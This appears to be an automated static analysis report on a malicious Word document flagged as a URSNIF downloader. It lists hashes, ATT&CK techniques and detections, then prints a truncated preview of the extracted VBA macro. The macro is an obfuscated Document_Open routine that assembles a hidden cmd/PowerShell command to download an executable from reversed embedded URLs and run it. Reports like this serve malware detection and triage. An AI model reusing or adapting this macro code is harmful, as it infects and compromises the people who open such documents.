Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e8da211413e494ab…

MALICIOUS

Office (OLE)

Size: 79.1 KB
Created: 2018-09-10 21:46:00
Authoring application: Microsoft Office Word
First seen: 2018-11-20
MD5: a20b7ef0a54ebdc43dfa3d0a49c02054
SHA-1: eec368a4db4c42ef511eba494fd3c7ad32c99e8e
SHA-256: e8da211413e494aba4f2ae0751aff70ef3d149e5b2ef45527dfd3ada5cbf62ee
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute arbitrary commands. This indicates an attempt to download and run a secondary payload. The ClamAV detection suggests this is a known downloader family, likely URSNIF, but specific IOCs for the payload are not present in this sample.

Heuristics (5)

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  6423 bytes
SHA-256: b86db82e910b167bb309538b884b991acc58171e2890dfa77c97949e926f5292
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "AllvOMTB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "395821486" + "342217374" + "EIWur" + "313644261"
   Second "Vimr" + "anpNjfstq"
   Second "KWCAZPIPUh" + "416930175" + "obAnGMJzFZoN" + "GvsF"
   Second "86084626" + "CdwbUb" + "OZEULLD" + "z"
   Second "322368232" + "8837"
Shell PnRkzQw + fidFPF + ZzPAtknVAkj, CStr(vbHide)
   Second "l" + "lLVJIudX"
End Sub



Attribute VB_Name = "jOnLdYSf"
Function PnRkzQw()

On _
Error _
Resume _
Next
Second "mCSh" + "h" + "386609376" + "101517046"
   Second "drA" + "FzBWGkXDPffKN"
FOBkvft = Format(Chr(18 + 0 + 14 + 9 + 58)) + "md /V" + ":" + "/" + Format(Chr(12 + 0 + 10 + 6 + 39)) + Format(Chr(5 + 0 + 4 + 2 + 23)) + "^se" + "^" + "t ^U"
Second "l" + "pQnHVBNrAPhN" + "fKKuODBAjYVi" + "PIX"
   Second "n" + "1785" + "9320" + "355708104"
   Second "2677965" + "L"
   Second "8859" + "opz"
   Second "137704104" + "8417"
vMHjrz = "K^" + "B" + "J=^" + " " + " ^  ^  " + "^" + " ^ " + "^   " + "^   " + "^ ^ "
Second "132397576" + "wMB"
   Second "rS" + "894" + "8595" + "Hl"
   Second "LAiJmRhbzTNzQV" + "j"
oVSTfQLaz = "^" + " }" + "^}{^" + "h" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "^ta" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "^}^;^" + "k^a^e" + "r^b;^k" + "vb^$ " + "met^I-" + "e^kovn^"
Second "1700" + "m"
   Second "uSIR" + "CCTrzHnHQvuai"
YqqiOwrHk = "I^" + ";)^kv" + "b^$^ ," + "Tw^H^" + "$(e" + "^l^i" + "F^daoln" + "^w" + "oD^.jNz" + "^" + "$^" + "{^yr"
Second "z" + "1005" + "Wwnq" + "63015192"
   Second "HGJaZD" + "1805"
   Second "APwJ" + "37477815" + "fSrpKtTipV" + "2045"
   Second "pkf" + "bCAEf"
FTbJAGQRK = "t" + "^{)" + "^G^" + "m^l^" + "$" + " n" + "^" + "i" + "^ ^" + "Tw^H^$(" + "h" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "aer"
Second "178504350" + "mN"
   Second "PfOuquNp" + "1317" + "4675" + "OJwZ"
   Second "QAjGPoFowTNZw" + "IQmcuUzGpVGdQZ"
   Second "3404" + "MZ"
nvVUjEwpwiX = "of;'e" + "xe.'+P^" + "dY^$" + "^+'\'" + "+" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "il" + "bup^:" + "vne^" + "$"
Second "SZN" + "83531853"
   Second "456667176" + "bjZz" + "6891" + "lG"
   Second "iwwKKNz" + "XfrihzBpAjk" + "dnj" + "rUPRQQISvCiZJ"
   Second "348223645" + "FpNARi"
   Second "154432135" + "426970889"
cBoQw = "=^k" + "vb$^;'^" + "8" + "6^2" + "' ^=" + " ^P" + "^d^Y^$" + "^;)^'"
Second "nFnXzk" + "HGqPDSqw" + "UHXZnf" + "cfO"
   Second "3672" + "nwrJG"
   Second "440736026" + "nPEd" + "KjJisQ" + "413250783"
OMpBarZtUG = "@'(^" + "t^" + "il" + "^p^S." + "'^F"
Second "Qfn" + "jin"
   Second "65712580" + "c" + "zBzjZSZvpzvW" + "vpR"
   Second "2184" + "PsSpj" + "7869" + "169444804"
   Second "rtbh" + "tIoLrkVcUqml" + "8896" + "HK"
   Second "SAfCvT" + "9070" + "FY" + "488034354"
TcXXjrEjXvE = "H^" + "4^9rr" + "^t" + "U" + "/r^" + "i.^" + "gnar" + "u^o/" + "/:p^" + "t^th@"
Second "328180639" + "qWQ"
   Second "LzFfd" + "5737" + "urjZ" + "316671595"
   Second "7178" + "4226" + "1226" + "zhzViLD"
   Second "IqiqlT" + "7274"
   Second "Ft" + "BXzF"
PctSMRAj = "9TR^d" + "^3" + "f" + "T6" + "/^a^u" + ".p^d.a" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "^il^es" + "ovo" + "n//^:" + "^ptt" + "^h@v^mT" + "dvJ/mo" + Format(Chr(18 + 0 + 14 + 9 + 58))
PnRkzQw = FOBkvft + vMHjrz + oVSTfQLaz + YqqiOwrHk + FTbJAGQRK + nvVUjEwpwiX + cBoQw + OMpBarZtUG + TcXXjrEjXvE + PctSMRAj
   Second "385788065" + "116672357"
   Second "iOvwwbG" + "N" + "1183" + "NOcjS"
End Function
Function fidFPF()

On _
Error _
Resume _
Next
Second "TJD" + "bHj" + "Di" + "iFTDr"
   Second "VbokqVMr" + "uFEQ"
   Second "wCJudFam" + "tMHLztz"
FJYRtRJ = "^.^y" + "n" + "^" + "a^p^m^" + "o" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "-" + "nny^"
Second "9068" + "9131"
   Second "fzipXpC" + "TcpFFtHqJKQwJ"
   Second "496444163" + "GjlmMkFRnG" + "KD" + "MTS"
   Second "mfLj" + "wzd"
Q
... (truncated)